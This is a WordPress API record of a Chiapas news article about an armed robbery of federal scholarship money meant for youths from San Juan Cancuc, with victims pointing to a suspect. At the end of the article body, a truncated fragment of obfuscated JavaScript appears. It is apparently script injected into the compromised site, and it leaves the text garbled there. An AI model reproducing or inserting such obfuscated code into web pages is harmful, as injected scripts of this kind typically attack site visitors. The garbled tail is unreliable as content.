{"id":3640,"date":"2022-07-15T02:45:42","date_gmt":"2022-07-15T02:45:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3640"},"modified":"2022-07-15T03:35:18","modified_gmt":"2022-07-15T03:35:18","slug":"piden-investigar-asalto-de-recurso-federal-destinado-a-jovenes-de-cancuc-senalan-a-presunto-responsable","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3640","title":{"rendered":"Piden investigar asalto de recurso federal, destinado a j\u00f3venes de Cancuc, se\u00f1alan a presunto responsable"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"652\" data-id=\"3642\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/c-1024x652.jpg\" alt=\"\" class=\"wp-image-3642\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/c-1024x652.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/c-300x191.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/c-768x489.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/c.jpg 1078w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"640\" data-id=\"3641\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-9.41.40-PM.jpeg\" alt=\"\" class=\"wp-image-3641\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-9.41.40-PM.jpeg 640w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-9.41.40-PM-300x300.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-9.41.40-PM-150x150.jpeg 150w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano.<\/p>\n\n\n\n<p>&nbsp;14 de abril del 2022.- Luego del asalto donde fue robado con lujo de violencia un importante recurso, j\u00f3venes beneficiarios del programa \u201cJ\u00f3venes Construyendo El Futuro\u201d, hicieron un llamado para hacer una exhaustiva investigaci\u00f3n para dar con los responsables.<\/p>\n\n\n\n<p>Cabe recordar que este hecho delictivo ocurri\u00f3 la madrugada de este mi\u00e9rcoles cuando sujetos fuertemente armados asaltaron a un grupo de j\u00f3venes becarios de programas federales originarios del municipio de San Juan Cancuc, con lujo de violencia despojaron la cantidad de 900 mil pesos a los viajeros que resultaron lesionados.<\/p>\n\n\n\n<p>Los hechos ocurrieron en el tramo carretero San Crist\u00f3bal-San Juan Cancuc a la altura del crucero Taza de Agua, donde se reportaron cuatro personas heridas de bala, incluyendo el ch\u00f3fer, quienes fueron interceptadas por los asaltantes, arrebatando el recurso que iba a ser destinado para pago del Programa de becas &#8220;Construyendo el Futuro&#8221; las v\u00edctimas fueron trasladadas al Hospital de Las Culturas en San Crist\u00f3bal de Las Casas.<\/p>\n\n\n\n<p>Los j\u00f3venes v\u00edctimas del robo, pidieron se abra una investigaci\u00f3n, como presunto responsable, en contra de Pedro &#8220;N&#8221;, quien es conocedor del manejo de los recursos &#8220;J\u00f3venes construyendo el Futuro&#8221; ya que \u00e9l\u00a0 y su gente son los \u00fanicos que sab\u00edan de la entrega de ese dinero que beneficiar\u00eda a los j\u00f3venes \u00a0de Cancuc.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano. &nbsp;14 de abril del 2022.- Luego del asalto donde fue robado con lujo de violencia un importante recurso, j\u00f3venes beneficiarios del programa \u201cJ\u00f3venes Construyendo El Futuro\u201d, hicieron un llamado para hacer una exhaustiva investigaci\u00f3n para dar con los responsables. Cabe recordar que este hecho delictivo ocurri\u00f3 la madrugada de este mi\u00e9rcoles &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3641,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3640","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3640","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3640"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3640\/revisions"}],"predecessor-version":[{"id":3644,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3640\/revisions\/3644"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3641"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3640"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3640"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3640"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}